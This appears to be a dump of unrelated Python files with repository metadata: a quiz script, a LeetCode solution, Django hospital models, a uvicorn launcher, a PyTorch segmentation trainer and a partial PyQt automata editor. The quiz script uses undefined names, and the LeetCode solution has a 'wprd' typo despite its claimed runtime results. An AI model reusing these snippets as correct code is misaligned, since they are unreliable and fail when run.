8a4708add6cdfe447fdcca3cdccadf54add34fad | 220f1e6f1bd604b0ce452d2337669ad72ef7c11e | /quiz.py | a002fa0a884bdd8c7e27d8c73631451a5e2cfbde | [] | no_license | bikashlama541/RoomA | 9545fa75cf0f02ef4022b692de366423b27d906d | a7f9035ad67ad7cc7e32e2bbb488d65f4ec5c4a1 | refs/heads/master | 2020-07-23T01:29:44.354382 | 2019-09-09T21:45:52 | 2019-09-09T21:45:52 | 207,400,892 | 0 | 1 | null | 2019-09-09T21:45:53 | 2019-09-09T20:42:38 | Python | UTF-8 | Python | false | false | 547 | py | class Question:
def __init__(self, prompt, answer):
self.prompt = prompt
self.answer = answer
questions_prompts = [
"What colors are apple?\n (a) Red/Green\n (b) Orange",
"What colors are bananas?\n (a) Red/Green\n (b)Yellow",
]
questions = [
Question(question_prompts[0], "a"),
Question(question_prompts[1], "b"),
]
def run_quiz(questions):
score = 0
for question in questions:
answer = inputer(question.prompt)
if answer == question.answer:
score +=1
print("You got", score, "out of", len(questions))
run_quiz(questions)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
4cce4300cd93c522062d17864b7d7b6579a90919 | eaeb685d13ef6c58364c5497c911f3e2f8c49a43 | /Solution/520_Detect_Capital.py | 72853824378aa294f92113350b1c6fc2394d75c7 | [] | no_license | raririn/LeetCodePractice | 8b3a18e34a2e3524ec9ae8163e4be242c2ab6d64 | 48cf4f7d63f2ba5802c41afc2a0f75cc71b58f03 | refs/heads/master | 2023-01-09T06:09:02.017324 | 2020-09-10T02:34:46 | 2020-09-10T02:34:46 | 123,109,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 448 | py | class Solution:
def detectCapitalUse(self, word: str) -> bool:
if word.isupper() or word.islower():
return True
elif word[1:].islower() and wprd[0].isupper():
return True
else:
return False
'''
Runtime: 40 ms, faster than 42.73% of Python3 online submissions for Detect Capital.
Memory Usage: 13.8 MB, less than 6.67% of Python3 online submissions for Detect Capital.
''' | [
"raririn.sandbag@gmail.com"
] | raririn.sandbag@gmail.com |
8451258e50d96e33c60b41669ed2db703480788c | c5e4a9a66f686de6eaca331f1ee3823ac925101b | /apps/management/models.py | 56efc0b62de24b22ffdb241452489a41abeab41d | [] | no_license | Tiilon/Hospital_project | b1409be60f0d6daecb0e294bfbe81698d97b7c1f | 6506218f4ad504f9031482999d9b33c92b350df8 | refs/heads/main | 2023-01-23T13:30:11.564836 | 2020-11-24T16:15:12 | 2020-11-24T16:15:12 | 303,461,057 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,585 | py | from random import randrange
from django.db import models
from django.conf import settings
from django.utils import timezone
# Create your models here.
class Ward(models.Model):
label = models.CharField(max_length=100, blank=True, null=True)
incharge = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='ward_incharge', blank=True, null=True)
beds= models.ManyToManyField('Bed', related_name='ward_beds', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='wards', blank=True, null=True)
patients= models.ManyToManyField('Patient', related_name='ward_patients', blank=True)
def __str__(self):
return self.label
class meta:
db_table= 'ward'
BED_STATUS = {
('Assigned', 'Assigned'),
('Unassigned', 'Unassigned')
}
class Bed(models.Model):
number = models.CharField(max_length=200, blank=True, null=True)
ward = models.ForeignKey(Ward, on_delete=models.SET_NULL, related_name='bed_ward',blank=True, null=True)
status = models.CharField(max_length=200,blank=True, null=True, choices=BED_STATUS)
allocate = models.ForeignKey('BedAllocate', on_delete=models.SET_NULL, related_name='bed_allocate', blank=True, null=True)
bed_allocates = models.ManyToManyField('BedAllocate', related_name='bed_bed_allocate', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='beds', blank=True, null=True)
def __str__(self):
return self.number
class Meta:
db_table = 'bed'
ordering = ('number',)
class BedAllocate(models.Model):
bed = models.ForeignKey(Bed, related_name='bed_allocate_bed', blank='True', null=True, on_delete=models.SET_NULL)
patient = models.ForeignKey('Patient', related_name='bed_allocate_patient', null=True, blank=True, on_delete=models.SET_NULL)
date_admitted = models.DateField(blank=True, null=True)
time_admitted = models.TimeField(blank=True, null=True)
time_discharged = models.TimeField(blank=True, null=True)
date_discharged = models.DateField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='bed_allocates', blank=True, null=True)
def __str__(self):
return f"{self.bed} - {self.patient}"
class Meta:
db_table = 'bed_allocate'
def generate():
FROM = '0123456789'
LENGTH = 10
pat_id = ""
for i in range(LENGTH):
pat_id += FROM[randrange(0, len(FROM))]
return f"PT{pat_id}/{timezone.now().year}"
GENDER = {
('Male', 'Male'),
('Female', 'Female'),
}
PATIENT_TYPE = {
('OPD', 'OPD'),
('Ward', 'Ward'),
('ER', 'EMERGENCY'),
('DISCHARGED', 'DISCHARGED')
}
MARITAL = {
('Married', 'Married'),
('Single', 'Single'),
('Divorced', 'Divorced'),
('Widowed', 'Widowed'),
}
class VitalSign(models.Model):
patient = models.ForeignKey('Patient', on_delete=models.SET_NULL, blank=True, null=True, related_name='vital_sign_patient')
time = models.TimeField(default=timezone.now)
weight = models.DecimalField( max_digits=10, decimal_places=2,blank=True, null=True)
diastolic = models.IntegerField( blank=True, null=True)
pulse = models.IntegerField(blank=True, null=True)
systolic = models.IntegerField( blank=True, null=True)
respiration = models.IntegerField( blank=True, null=True)
temperature = models.DecimalField( max_digits=10, decimal_places=2,blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True, related_name='vital_signs')
class Meta:
db_table = 'vital_sign'
ordering = ('-time',)
def __str__(self):
return f"{self.patient.full_name()}-{self.time}"
class Patient(models.Model):
patient_id = models.CharField(default=generate, unique=True, editable=False, max_length=100)
first_name = models.CharField(max_length=100, blank=True, null=True)
last_name = models.CharField(max_length=100, blank=True, null=True)
patient_type = models.CharField(max_length=100, blank=True, null=True, choices=PATIENT_TYPE)
gender = models.CharField(max_length=100, blank=True, null=True, choices=GENDER)
marital_status = models.CharField(max_length=100,blank=True,null=True,choices=MARITAL)
date_of_birth = models.DateField(blank=True, null=True)
date_admitted = models.DateField(blank=True, null=True)
time_admitted = models.TimeField(blank=True, null=True)
time_discharged = models.TimeField(blank=True, null=True)
date_discharged = models.DateField(blank=True, null=True)
bed = models.ForeignKey(Bed, on_delete=models.SET_NULL, related_name='patient_bed', blank=True, null=True)
vital_signs = models.ManyToManyField(VitalSign, related_name='patient_vital_signs', blank=True)
discharged_at = models.DateTimeField(blank=True, null=True)
diagnoses = models.ManyToManyField('MedicalDiagnosis', related_name='patient_diagnosis', blank=True)
notes = models.ManyToManyField('department.Note', related_name='patient_notes', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='patients', blank=True, null=True)
def __str__(self):
return self.patient_id
def full_name(self):
return f"{self.first_name} {self.last_name}"
class Meta:
db_table = 'patient'
class MedicalDiagnosis(models.Model):
patient = models.ForeignKey(Patient, on_delete=models.SET_NULL, related_name='diagnosis_patient', blank=True, null=True)
complaints = models.CharField(max_length=1000, blank=True, null=True)
symptoms = models.CharField(max_length=2000, blank=True, null=True)
diagnosis = models.CharField(max_length=100,blank=True, null=True)
is_admitted = models.BooleanField(blank=True,null=True)
onset = models.CharField(max_length=100, blank=True, null=True)
treatments = models.ManyToManyField('Treatment', related_name='diagnosis_treatments', blank=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='diagnosis', blank=True, null=True)
def __str__(self):
return self.diagnosis
class Meta:
db_table= 'medical diagnosis'
ordering = ('-created_at',)
TREATMENT_STATUS = {
('Pending', 'Pending'),
('Canceled','Canceled'),
('Completed', 'Completed'),
}
class Treatment(models.Model):
diagnosis = models.ForeignKey(MedicalDiagnosis, on_delete=models.SET_NULL, related_name='treatment_diagnosis', blank='null', null=True)
treatment = models.CharField(max_length=2000, blank=True, null=True)
prescription = models.CharField(max_length=2000, blank=True,null=True)
pharmacy_prescription = models.ForeignKey('pharmacy.Prescription', on_delete= models.SET_NULL, related_name='treatment_prescription', blank=True, null=True)
status = models.CharField(max_length=100,blank=True,null=True, choices= TREATMENT_STATUS)
time_treated = models.TimeField(blank=True, null=True)
date_treated= models.DateField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='treatments',blank=True, null=True)
def __str__(self):
return str(self.treatment) + ' - ' + str(self.prescription)
class Meta:
db_table = 'treatment'
ordering = ('-created_at',)
COMPLAINTS_STATUS = {
('Pending', 'Pending'),
('Resolved', 'Resolved'),
('Canceled', 'Canceled'),
}
class Complaints(models.Model):
complaints = models.TextField(blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaints', blank=False, null=True)
review = models.CharField(max_length=3000, blank=True, null=True)
is_seen = models.BooleanField(blank=True, null=True, default=False)
seen_at = models.DateTimeField(blank=True, null=True)
seen_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaint_seen', blank=False, null=True)
status = models.CharField(max_length=200, blank=True, null=True, choices=COMPLAINTS_STATUS)
review_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='complaint_review',blank=False, null=True)
review_at = models.DateTimeField(blank=True, null=True)
class Meta:
ordering = ('-created_at',)
db_table = 'complaint'
def __str__(self):
return str(self.complaints)
DEPARTMENTS ={
('Ward', 'Ward'),
('Pharmacy', 'Pharmacy'),
('Account', 'Account'),
('Management', 'Management'),
('HR', 'Human Resource')
}
REQUEST_STATUS = {
(0, 'Pending'),
(1, 'Accepted'),
(2, 'Rejected')
}
class Request(models.Model):
department = models.CharField(max_length=200, blank=True, null=True, choices=DEPARTMENTS)
description = models.TextField(max_length=5000, blank=True, null=True)
status = models.IntegerField(blank=True, null= True, choices=REQUEST_STATUS)
comments = models.CharField(max_length=1000, blank=True, null=True)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='requests', blank=True, null=True)
def __str__(self):
return str(self.department)
class Meta:
db_table = 'request'
class Expenditure(models.Model):
category = models.CharField(max_length=100, blank=True, null=True)
item = models.CharField(max_length=300, blank=True, null=True)
total_cost = models.DecimalField(max_digits=10, blank=True, null=True, decimal_places=2)
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='expenditures', blank=True, null=True)
def __str__(self):
return f"{self.category} - {self.total_cost}"
class Meta:
db_table = 'expenditure'
class LeavePeriod(models.Model):
start_date = models.DateField(blank=True, null=True)
end_date = models.DateField(blank=True, null=True)
num_of_days = models.IntegerField(default=0)
days_allowed = models.IntegerField(default=0)
staffs = models.ManyToManyField('staff.Staff', related_name='staff', blank='null')
created_at = models.DateTimeField(default=timezone.now)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, related_name='leave_periods', blank=True, null=True)
def __str__(self):
return f"{self.start_date}-{self.end_date}"
class Meta:
db_table = 'leave_period'
STREAMS = {
('Government', 'Government'),
('Patient', 'Patient'),
('Donation', 'Donation')
}
class Revenue(models.Model):
stream = models.CharField(max_length=200, blank=True, null=True, choices=STREAMS)
bill = models.ForeignKey('portal.Bill', related_name='revenue_bill', on_delete=models.SET_NULL, blank=True, null=True)
patient = models.ForeignKey(Patient, on_delete=models.SET_NULL, related_name='revenue_patient', blank=True, null=True)
description = models.CharField(max_length=100, blank=True, null=True)
amount = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)
created_at = models.DateTimeField(blank=True, null=True)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True, related_name='revenues')
def __str__(self):
return str(self.stream)
class Meta:
db_table = 'revenue'
ordering = ('-created_at',)
A_STATUS = {
('Show', 'Show'),
('Hide', 'Hide')
}
# class Announcement(models.Model):
# message = models.CharField(max_length=200, blank=True, null=True)
# title = models.CharField(max_length=200, blank=True, null=True)
# status = models.CharField(max_length=200, blank=True, null=True, choices=A_STATUS) | [
"tiilon42@gmail.com"
] | tiilon42@gmail.com |
9f80e717ea9714ed99db1309ab8affa2ee9ab24d | faf80886b0b826b0b9ec45e5e99112ddcdf55382 | /venv2/bin/uvicorn | 5817609c8197a3c3db081314c9ae55f0b2a3494c | [] | no_license | pythonashoksahu/testpro | 84c9b5d30ab053421252eebd05aa00a33cfcd76e | 870f3b7017948f6bc9d21e7cf25aebe816fc103d | refs/heads/master | 2023-03-14T04:48:57.411522 | 2021-02-25T07:15:04 | 2021-02-25T07:15:04 | 342,155,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | #!/home/republic/PycharmProjects/projectfastapi/venv2/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from uvicorn.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"niraj.kmr777s@gmail.com"
] | niraj.kmr777s@gmail.com | |
268df992d4a58fa7d9720b5e331578c2652054a2 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/image_segmentation/NAS-SEGM_ID1142_for_PyTorch/src/engine/trainer.py | 6e598066959d4fb2592982d4218e84c0c4d156e0 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later",
"LicenseRef-scancode-proprietary-license"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 11,811 | py | #
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
"""Training functions"""
import time
import logging
from collections import defaultdict
import numpy as np
import torch
from torch import nn
from helpers.utils import AverageMeter, try_except
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
logger = logging.getLogger(__name__)
@try_except
def populate_task0(segmenter, train_loader, kd_net, n_train, do_kd=False):
"""Populate data for task0 - the outputs of encoder.
Args:
segmenter (nn.Module) : segmentation network
train_loader (DataLoader) : training data iterator
kd_net (nn.Module) : teacher network if any
n_train (int) : how many samples to pre-compute
do_kd (boolean) : whether to do knowledge distillation
"""
Xy_train = defaultdict(list)
segmenter.eval()
# Populate Xy_train with encoder's outputs
try:
train_loader.dataset.set_stage("train")
except AttributeError:
train_loader.dataset.dataset.set_stage("train")
train_loader.batch_sampler.batch_size = 1 # to not run out of memory
with torch.no_grad():
n_curr = 0
for sample in train_loader:
image = sample["image"].float().npu()
target = sample["mask"].float()
enc_outputs = segmenter.module.encoder(image)
for i, enc_output in enumerate(enc_outputs):
Xy_train[i].extend(enc_output.unbind(0))
Xy_train["y"].extend(
nn.functional.interpolate(
target[:, None], size=enc_outputs[0].size()[2:], mode="nearest"
)
.long()
.squeeze(dim=1)
.npu()
.unbind(0)
)
if do_kd:
kd_y = kd_net(image)
Xy_train["kd_y"].extend(
nn.functional.interpolate(
kd_y,
size=enc_outputs[0].size()[2:],
mode="bilinear",
align_corners=False,
).unbind(0)
)
n_curr += image.size(0)
if n_curr >= n_train:
# By default we are taking the size of the first encoder output
# as our output size
Xy_train["out_size"] = enc_outputs[0].size()[2:]
logger.info(" Populated Xy_train, N = {}".format(n_curr))
break
# concat into a single tensor
for k, v in Xy_train.items():
if k != "out_size":
Xy_train[k] = torch.stack(v)
return Xy_train
@try_except
def train_task0(
Xy_train,
segmenter,
optim_dec,
epoch,
segm_crit,
kd_crit,
batch_size,
freeze_bn,
do_kd,
kd_coeff,
dec_grad_clip,
do_polyak,
avg_param=None,
polyak_decay=0.9,
aux_weight=0,
):
"""Training task0 segmenter - only decoder
Args:
Xy_train (dict) : pre-computed data
segmenter (nn.Module) : segmentation network
optim_dec (optim) : optimiser for decoder
epoch (int) : current segm epoch
segm_crit (nn.Loss) : segmentation criterion
kd_crit (nn.Loss) : knowledge distillation criterion
batch_size (int) : batch size used for training
freeze_bn (bool) : whether to keep batch norm statistics intact
do_kd (bool) : whether to do knowledge distillation
kd_coeff (float) : loss coefficient for knowledge distillation
dec_grad_clip (float) : clip decoder's parameters' norm to this value
do_polyak (bool) : whether to do Polyak averaging
avg_param : copy of parameters for Polyak averaging
polyak_decay (float) : momentum for Polyak averaging
aux_weight (float) : loss coefficient for auxiliary outputs
"""
# Train
n_examples = Xy_train[0].size(0)
batch_size = min(batch_size, n_examples)
n_passes = n_examples // batch_size
indices = np.arange(n_examples)
batch_time = AverageMeter()
losses = AverageMeter()
# Update BNs if not set otherwise
segmenter.module.decoder.train()
if freeze_bn:
for m in segmenter.module.decoder.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
np.random.shuffle(indices)
n=0
for i in range(n_passes):
if n==1:
pass
n=n+1
start = time.time()
train_idx = indices[(i * batch_size) : (i + 1) * batch_size]
encoder_outputs = [
Xy_train[key][train_idx]
for key in Xy_train.keys()
if key not in ["y", "kd_y", "out_size"]
]
output = segmenter.module.decoder(encoder_outputs)
if isinstance(output, tuple):
output, aux_outs = output
# NOTE: Output size can change as some layers will not be connected
output = nn.functional.interpolate(
output, size=Xy_train["out_size"], mode="bilinear"
)
soft_output = nn.LogSoftmax()(output)
# Compute loss and backpropagate
loss = segm_crit(soft_output, Xy_train["y"][train_idx])
if do_kd:
kd_loss = kd_crit(output, Xy_train["kd_y"][train_idx])
loss += kd_coeff * kd_loss
if aux_weight > 0:
for aux_out in aux_outs:
aux_out = nn.Upsample(
size=Xy_train["out_size"], mode="bilinear", align_corners=False
)(aux_out)
aux_out = nn.LogSoftmax()(aux_out)
# Compute loss and backpropagate
loss += segm_crit(aux_out, Xy_train["y"][train_idx]) * aux_weight
optim_dec.zero_grad()
loss.backward()
# Clip gradients' norm
nn.utils.clip_grad_norm_(segmenter.module.decoder.parameters(), dec_grad_clip)
optim_dec.step()
losses.update(loss.item())
batch_time.update(time.time() - start)
if do_polyak:
for p, avg_p in zip(segmenter.module.decoder.parameters(), avg_param):
avg_p.mul_(polyak_decay).add_(1.0 - polyak_decay, p.data)
logger.info(
" Train epoch: {}\t"
"Avg. Loss: {:.3f}\t"
"Avg. Time: {:.3f}".format(epoch, losses.avg, batch_time.avg)
)
@try_except
def train_segmenter(
segmenter,
train_loader,
optim_enc,
optim_dec,
epoch,
segm_crit,
freeze_bn,
enc_grad_clip,
dec_grad_clip,
do_polyak,
print_every=10,
aux_weight=-1,
avg_param=None,
polyak_decay=0.99,
):
"""Training segmenter end-to-end.
Args:
segmenter (nn.Module) : segmentation network
train_loader (DataLoader) : training data iterator
optim_enc (optim) : optimiser for encoder
optim_dec (optim) : optimiser for decoder
epoch (int) : current segmenter epoch
segm_crit (nn.Loss) : segmentation criterion
freeze_bn (bool) : whether to keep batch norm statistics intact
enc_grad_clip (float) : clip encoder's parameters' norm to this value
dec_grad_clip (float) : clip decoder's parameters' norm to this value
do_polyak (bool) : whether to do Polyak averaging
print_every (int) : how often to print out information
aux_weight (float) : loss coefficient for auxiliary outputs
avg_param : copy of parameters for Polyak averaging
polyak_decay (float) : momentum for Polyak averaging
"""
try:
train_loader.dataset.set_stage("train")
except AttributeError:
train_loader.dataset.dataset.set_stage("train") # for subset
segmenter.train()
if freeze_bn:
for m in segmenter.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
batch_time = AverageMeter()
losses = AverageMeter()
m=0
for i, sample in enumerate(train_loader):
if m==0:
pass
m=m+1
start = time.time()
image = sample["image"].float().npu()
target = sample["mask"].npu()
target_var = torch.autograd.Variable(target).float()
# Compute output
output = segmenter(image)
if isinstance(output, tuple):
output, aux_outs = output
target_var = nn.functional.interpolate(
target_var[:, None], size=output.size()[2:], mode="nearest"
).long()[:, 0]
soft_output = nn.LogSoftmax()(output)
# Compute loss and backpropagate
loss = segm_crit(soft_output, target_var)
# Compute auxiliary loss
if aux_weight > 0:
for aux_out in aux_outs:
aux_out = nn.Upsample(
size=target_var.size()[1:], mode="bilinear", align_corners=False
)(aux_out)
aux_out = nn.LogSoftmax()(aux_out)
# Compute loss and backpropagate
loss += segm_crit(aux_out, target_var) * aux_weight
optim_enc.zero_grad()
optim_dec.zero_grad()
loss.backward()
# Clip gradients' norm
if enc_grad_clip > 0:
nn.utils.clip_grad_norm_(
segmenter.module.encoder.parameters(), enc_grad_clip
)
if dec_grad_clip > 0:
nn.utils.clip_grad_norm_(
segmenter.module.decoder.parameters(), dec_grad_clip
)
optim_enc.step()
optim_dec.step()
if do_polyak:
for p, avg_p in zip(segmenter.parameters(), avg_param):
avg_p.mul_(polyak_decay).add_(1.0 - polyak_decay, p.data)
losses.update(loss.item())
batch_time.update(time.time() - start)
bt=time.time() - start
if i % print_every == 0:
logger.info(
" Train epoch: {} [{}/{}]\t"
"Avg. Loss: {:.3f}\t"
"Avg. Time: {:.3f}".format(
epoch, i, len(train_loader), losses.avg, bt
)
)
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
f4f0cff6f974d4d35b0bc2790b525b68d3c8bf48 | 9c17ef83b0f5bf93438f210dbdcd2a4be566a9ee | /V3/graph.py | 057b8c82b4bd2c7f98eddeba6acdb60c6ae0d307 | [] | no_license | rubencg195/GraphEditor | b8a76f287c8d065e1fec06417a3eaf25a10ed8fd | af271aaa9e83c59e9cfa1012b04ce2e6b39787c2 | refs/heads/master | 2021-01-20T05:46:39.995102 | 2017-08-27T16:40:10 | 2017-08-27T16:40:10 | 101,469,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,605 | py | import sys
import json
from random import randint
from PyQt4 import QtCore, QtGui
from fysom import Fysom
# from automata.fa.dfa import DFA
# from automata.fa.nfa import NFA
import logging
import pickle
import re
from DFA import DFA
from NFA import NFA
from NFA_e import NFAe
from grammaregex import print_tree, match_tree, find_tokens, verify_pattern, PatternSyntaxException
import AutomataLib
currNode = None
nextNode = None
nodeList = []
conList = []
painter = None
canvas = None
mainWidget = None
mode = "NFA"
action = ""
startNode = None
evalValue = None
symbols = {'0', '1'}
alphabet = "0,1"
# alphabet = "0,1,2,3,4,5,6,7"
# testFilename = "/home/ruben/Desktop/Computer Theory/V3/examples/DFA"
testFilename = "/home/ruben/Desktop/Computer Theory/V3/examples/cantidad 1 y 0 impar V3"
# testFilename = "/home/ruben/Desktop/Computer Theory/V3/examples/NFA_e"
logger = logging.Logger('catch_all')
app = QtGui.QApplication(sys.argv)
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Canvas(QtGui.QWidget):
def __init__(self, parent):
QtGui.QWidget.__init__(self, parent)
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
for con in conList:
try:
qp.setPen(QtGui.QColor(con.red , con.green , con.blue))
pen = qp.pen()
pen.setWidth(5)
qp.setPen(pen)
qp.setFont(QtGui.QFont('Decorative', 20))
# print con.node.name , " to ", con.nextNode.name , " node " ,con.name
x1 = con.node.x()
y1 = con.node.y()
x2 = con.nextNode.x()
y2 = con.nextNode.y()
if(not con.node.deleted and not con.nextNode.deleted):
if(con.node != con.nextNode):
qp.drawLine(x1+25, y1+25, x2+25 , y2+25 )
slope = ( y2 - y1 ) / ( x2 - x1 )
factor = -15
factorX = slope * factor
factorY = slope * factor
qp.drawText(QtCore.QPoint( x2 + factorX , y2 + factorY ) , con.name )
else:
qp.drawEllipse(con.node.x() - 25 , con.node.y() - 25 , 50 , 50 )
factorX = -50
factorY = -50
qp.drawText(QtCore.QPoint( x2 + factorX , y2 + factorY ) , con.name )
else:
print( "alguno es nulo")
if(con.node.deleted):
con.delCon(con.nextNode)
if(con.nextNode.deleted):
con.delCon(con.node)
except:
pass
qp.end()
class Ui_MainWindow(QtGui.QWidget):
    """Main window: a fixed-geometry side menu plus the automaton canvas.

    Owns widget construction (setupUi/retranslateUi), signal wiring
    (eventManager), pickle-based save/load, and the node/connection
    add/edit/delete actions driven by the side menu.

    Fixes vs. the previous revision:
      * ``eventManager`` assigned ``self.canvas.mousePressEvent`` twice.
      * ``load`` iterated ``nodeList`` while ``Node.delNode()`` removed
        elements from it, skipping every other node on reload.
      * ``load`` read the pickled alphabet into a *local* variable; it now
        restores the module-level ``alphabet``.
    """

    def __init__(self):
        QtGui.QWidget.__init__(self)

    def setupUi(self):
        """Create and place every widget, publish the canvas/window globals,
        then apply translations and connect signals."""
        self.setObjectName(_fromUtf8("MainWindow"))
        self.resize(1500, 900)
        # --- left-hand menu panel -----------------------------------------
        self.menu = QtGui.QWidget(self)
        self.menu.setGeometry(QtCore.QRect(10, 10, 251, 900))
        self.menu.setObjectName(_fromUtf8("menu"))
        self.pushButton_edit = QtGui.QPushButton(self.menu)
        self.pushButton_edit.setGeometry(QtCore.QRect(10, 536, 221, 51))
        self.pushButton_edit.setObjectName(_fromUtf8("pushButton_edit"))
        self.pushButton_delete = QtGui.QPushButton(self.menu)
        self.pushButton_delete.setGeometry(QtCore.QRect(10, 596, 221, 51))
        self.pushButton_delete.setObjectName(_fromUtf8("pushButton_delete"))
        self.pushButton_add = QtGui.QPushButton(self.menu)
        self.pushButton_add.setGeometry(QtCore.QRect(10, 476, 221, 51))
        self.pushButton_add.setObjectName(_fromUtf8("pushButton_add"))
        # Automaton type selector (texts set in retranslateUi: DFA/NFA/NFA EPSILON/REGEX).
        self.comboBox_type = QtGui.QComboBox(self.menu)
        self.comboBox_type.setGeometry(QtCore.QRect(10, 30, 221, 51))
        self.comboBox_type.setObjectName(_fromUtf8("comboBox_type"))
        self.comboBox_type.addItem(_fromUtf8(""))
        self.comboBox_type.addItem(_fromUtf8(""))
        self.comboBox_type.addItem(_fromUtf8(""))
        self.comboBox_type.addItem(_fromUtf8(""))
        # Edit-target selector: act on a NODE or on a CONNECTION.
        self.comboBox_edit_type = QtGui.QComboBox(self.menu)
        self.comboBox_edit_type.setGeometry(QtCore.QRect(10, 90, 221, 51))
        self.comboBox_edit_type.setObjectName(_fromUtf8("comboBox_type"))
        self.comboBox_edit_type.addItem("NODE")
        self.comboBox_edit_type.addItem("CONNECTION")
        self.label_con = QtGui.QLabel("Node Connections", self.menu)
        self.label_con.setGeometry(QtCore.QRect(90, 150, 68, 17))
        self.comboBox_con = QtGui.QComboBox(self.menu)
        self.comboBox_con.setGeometry(QtCore.QRect(10, 190, 221, 51))
        self.pushButton_deselect = QtGui.QPushButton("Deselect", self.menu)
        self.pushButton_deselect.setGeometry(QtCore.QRect(10, 250, 221, 61))
        self.pushButton_deselect.setObjectName(_fromUtf8("pushButton_con"))
        self.label = QtGui.QLabel(self.menu)
        self.label.setGeometry(QtCore.QRect(100, 390, 68, 17))
        self.label.setObjectName(_fromUtf8("label"))
        self.lineEdit_value = QtGui.QLineEdit(self.menu)
